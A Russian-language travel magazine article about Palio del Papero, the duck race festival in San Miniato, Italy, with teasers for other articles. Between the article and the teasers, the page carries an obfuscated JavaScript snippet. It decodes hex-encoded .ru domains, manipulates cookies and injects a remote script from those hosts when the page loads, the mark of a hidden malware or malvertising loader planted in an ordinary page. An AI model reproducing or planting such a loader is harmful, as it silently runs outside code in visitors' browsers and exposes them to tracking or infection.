RU  UK  EN
Статьи  >  Представь  >  Palio del Papero: не только птицы

Palio del Papero: не только птицы

Сколько всего смешивает в своем котле Италия: гондолы, плавающие по оливковым рекам, палящее солнце, стекающее своим соком в бутылку Пизанской башни, запутанное спагетти улочек и лепешки площадей, присыпанные смесью итальянских трав и диалектов. А еще есть там… утки! Да-да, именно эти создания позволят вам ощутить привкус подлинного национального колорита.

И этой утиной истории уже более тридцати лет.  Она берет свое начало с 1982 года. Маленький итальянский городок Сан-Миниато, раскинувшийся на холме вблизи Балконевизи, был обычным фермерским поселком. Местных жителей всегда было немного. А в 50–60-х годах прошлого века, после военных действий и других проблем, в селении осталось всего несколько десятков семей.

Но в начале 80-х некоторые семьи стали возвращаться на родные земли. И чтобы как-то возродить край, они решили основать фестиваль, где собирались угощать грибами и белыми трюфелями, которыми славится эта местность. В 1982 году организаторы решили подогреть интерес к фестивалю, и традиционные трюфельно-грибные трапезы превратилась в гарнир к основному блюду. Ведь с тех пор самым зрелищным на празднике стало вовсе не поедание гастрономических деликатесов, а «утиные гонки».

Утиный фестиваль (Palio del Papero), который носит еще название Гонки Палио, традиционно проводится во вторую субботу октября. Это время, когда осень уже вступила в свои права, даря ласковое солнце, яркие краски и эмоции.

Чтобы побороться за главный приз, четыре близлежащие города: Формацино (Fornacino), Иль Борго (Il Borgo), Буччио (Buecchio) и Фондо ди Сцеса (Fondo di Scesa) – должны выставить своих марафонцев. Все участники выдвигают по паре уток-бегунов, которых именуют в честь родного города. Птицы должны преодолеть эстафету в 150 метров. При этом «наставники» пернатых должны поощрять их, чтобы привести к финишу раньше соперников и спасти от попадания в суп. Последнее, конечно, шутка. Отношение к уткам под особым контролем. Во время гонки птиц нельзя не только толкать, но и вообще касаться, подгонять разрешено только голосом. На фестиваль также приглашают инспекторов, которые проверяют условия содержания бегунов, процесс подготовки к гонкам и следят, чтобы тренеры «не распускали рук».

Зрители придумывают прогнозы, делают настоящие ставки и наблюдают, как конкуренты преодолевают дистанцию. Утки своим бегом вызывают настоящий азарт, ведь их поведение довольно непредсказуемо.

По окончанию гонки гости фотографируются с птицами-финалистами, спорят относительно участников и празднуют вместе с победителями.

А еще зрители становятся свидетелями исторического парада, изображающего события, которые происходили на землях Сан-Миниато. Это мероприятие восстанавливает в памяти жителей знаменательные даты и вехи, а туристы получают небольшой экскурс в прошлое города, узнавая новое и неизвестное. Людей увлекает история мест, подаривших Италии и всему миру таких выдающихся личностей, как: поэт Франко Сакетти, композитор Марио Масканьи, братья-кинорежиссеры Паоло и Витторио Тавиани и другие.

После спортивно-культурных зрелищ наступает время отведать традиционной итальянской кухни, дегустируя деликатесы. Белые трюфели, выращенные в окрестностях Сан-Миниато, славятся своими большими размерами и высоким качеством. Традиции выращивания, ухода и торговли белыми трюфелями уходят в средневековье. Поэтому местные знают толк и угощают вкусным, высококлассным продуктом.

Участие в утином фестивале непременно даст понять, пришелся ли вам впору итальянский башмачок.

window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="16101",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("theoutlook.com.ua")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();

Вам это будет интересно:
Драться, как женщина. Бойцовский клуб летающих чолит
У вольной борьбы не женское лицо. Хорошая девочка должна мило улыбаться и беречь нарядное платьице, а не размахивать кулаками, но в суровых Андах такие нежные цветы не растут. Настоящая боливийская чолита и за словом в карман не полезет, и тумаком при случае угостит, а в воскресенье, подобрав накрахмаленные юбки, отчаянно ринется в бой без правил.
Такси по-венециански: гондолы
Наверное, на планете нет такого человека, который хотя бы краем уха не слышал об удивительном итальянском городе на воде. Венеция с ее неповторимой архитектурой, фантастическими пейзажами и собственной атмосферой уже много веков манит людей со всех концов света. И чтобы прочувствовать ее по полной и увидеть под неожиданным углом, нужно обязательно поплавать на легендарных гондолах.
Кровь. Деньги. Перья.
Данное развлечение под строгим запретом почти во всех странах мира. Но любителей петушиных боёв это не останавливает. На полулегальные соревнования всегда собираются полные залы или дворы, зависимо от того, где проходят смертельные птичьи схватки. Зрители буквально смакуют то, как пернатые рвут друг друга в клочья, без жалости к себе и сопернику.
Вкусная Япония: попробовать страну на зуб
Мороженое со вкусом конины, маринованные насекомые, рыба со смертельным ядом – японской кухне есть чем удивлять, поражать и шокировать. И честно говоря, перечисление этих блюд абсолютно не всегда способствует аппетиту. Но мы не гонимся за экзотикой.
Живой танец. Полька
Этот танец не имеет никакого отношения к Польше. В этой жизнерадостной и озорной пляске кружится вся Европа и Америка, лишь скромно прибавляя к слову «полька» своё географическое расположение. Например, финская, андижонская или даже мексиканская. Именно с этой хореографии начинают дети, её же считают «высшим классом», который под силу лишь выносливым танцорам с крепким вестибулярным аппаратом.
Мандалотерапия
Вчера я сотворила Вселенную. Взяла немного гороха, риса, гречки, пшена, зёрен чёрного, белого перца и кардамона. Прихватила по горсти кофе и аниса. Затем у всего этого появился центр. Он разрастался, успокаивая мои мысли. Когда же последнее зёрнышко легло в круг, я опять ощутила забытую гармонию, услышала птиц сквозь шум машин на проспекте, повеяло ароматом фиалок...
Самый цимес или где кошерно покушать в Украине?
Отношение к еде в еврейской культуре особенное. И это очень мудрый подход. Ведь выражение: «Мы то, что мы едим» правило для тех, кто хочет быть здоровым и полным энергии. Продукты, которые мы употребляем, влияют не только на наше физическое самочувствие, но и на настроение.
Иллюзии Сикстинской капеллы
Более чем полтысячи лет назад, взорам восхищенных римлян впервые открылась Сикстинская капелла. За это время рождались и умирали как сами мастера росписи, так и целые направления в изобразительном искусстве, а на капеллу, все так же разинув рты от восторга, глядят уже наши с вами современники.
В Посольстве Узбекистана прошла встреча Ambassador’s Spouses Club Kiev
Посольство Узбекистана в Украине и Ambassador’s Spouses Club Kiev ознакомили украинскую общественность и иностранных гостей с национальным искусством узбекского народа, традициями и правилами создания произведения искусства, сотворенных руками народных творцов, ремесленниками из Узбекистана.
12 ликов Южной Кореи
Когда-то выразить своё недовольство грубостью или жадностью хозяев, а то и обратиться к какому-либо божеству с нескромной просьбой корейские крестьяне могли лишь в танце, надев при этом маску. Сохраняя свою анонимность, люди разыгрывали сцены из жизни, плакали и смеялись. А в конце представления судьба награждала хороших героев и наказывала злодеев.
ВИДЕО: Киев встретил весну. Посольства восьми стран подарили столице праздник NOWRUZ
Восемь Посольств иностранных государств: Азербайджана, Афганистана, Казахстана, Кыргызстана, Таджикистана, Туркменистана, Турции, Узбекистана при организационном содействии проекта OUTLOOK и при поддержке Департамента культуры КГГА пригласили киевлян, представителей диаспор и национально культурных обществ вместе отпраздновать Международный день NOWRUZ. О том, как прошло торжество - в нашем новом видеоролике.
Белое золото Поднебесной. Китайский фарфор
Цивилизация древнего Китая одной из первых открыла для себя керамику. Установлено, что уже во II тыс. до н.э. температура обжига гончарных изделий, найденных в долине Хуанхэ, приближалась к 1200°С. По мнению ряда исследователей, изобретение фарфора было продиктовано стремлением найти замену нефриту и жадеиту.
Киев встретил весну. Посольства восьми стран подарили столице красочный праздник NOWRUZ 2018
В Колонном зале Киевского городского совета состоялось празднование Международного дня NOWRUZ. Вот уже в третий раз в столице пышно отмечают приход весны. Атмосфера дружбы, единения культур и душевного тепла, то что отличает ставшее уже традиционным торжество в стенах мэрии.
Лигурия: средиземноморский рецепт идеальных городов
Собираясь на Лигурийское побережье, не стоит тешить себя мыслями, что вам удастся всего за несколько дней объездить его вдоль и поперек и посмотреть все . Так вы только раздразните свой туристический аппетит. Каждым ингредиентом непревзойденной Лигурии нужно только лакомиться, забывая при этом о существовании всего остального мира.
Посол Венгрии провел дипломатический прием по случаю национального праздника
Чрезвычайный и Полномочный Посол Венгрии в Украине Эрно Кешкень провел торжественный дипломатический прием по случаю национального праздника - 170-й годовщины венгерской революции и освободительной борьбы 1848 - 1849 годов.
Священные животные инков
Наш «перуанский цикл» продолжается рассказом о самых почитаемых животных в Перу. Они – как связь между сегодняшним и прошлым, играют важную роль в жизни этого народа.Мудрые предки современных перуанцев, древние инки, жили в полной гармонии со всем живым, что их окружало. Все живое, по их мнению, имело свою энергию, свое сознание, которое нельзя измерить или оценить ...
Посольства восьми стран и этнонациональные общества отпразднуют в Киеве NOWRUZ 2018
20 марта 2018 года в Колонном зале Киевского городского совета состоится празднование Международного дня NOWRUZ.
Ручная работа: персидские ковры
В те времена, когда персидским воинам не было равных, а их силе покорились Римская империя и Аравийский полуостров, из-под пальцев мастериц народа-победителя вышел первый шедевр. «Весенний ковёр» стал самым дорогим в истории человечества. Он символизировал власть и мощь персов, а его красота повествовала о божественном происхождении царя Хосрова І.
Вместо тележки – лодка: знаменитые плавучие рынки
Магазины, супермаркеты, рынки – все эти места неотъемлемая часть жизни практически каждого человека на нашей планете. Казалось бы, что в них необычного – всюду всё схожее, разве что товары и цены разнятся в зависимости от страны или города. На самом деле, это не совсем так – на некоторые базары нужно добираться вплавь…. О них мы и расскажем сегодня!
Йодль – музыка австрийских гор
Три года назад в Австрии появился необычный маршрут,его выбирают любители вокального стиля йодль. Бредут туристы по долине Циллерталь, широкая тропа сужается, открывая путь лишь для самых заядлых, и извилистая дорожка уводит ввысь. Заглядывают путешественники в хижину, принявшую звонкую форму колокольчика...
Закрыть
Outlook facebook page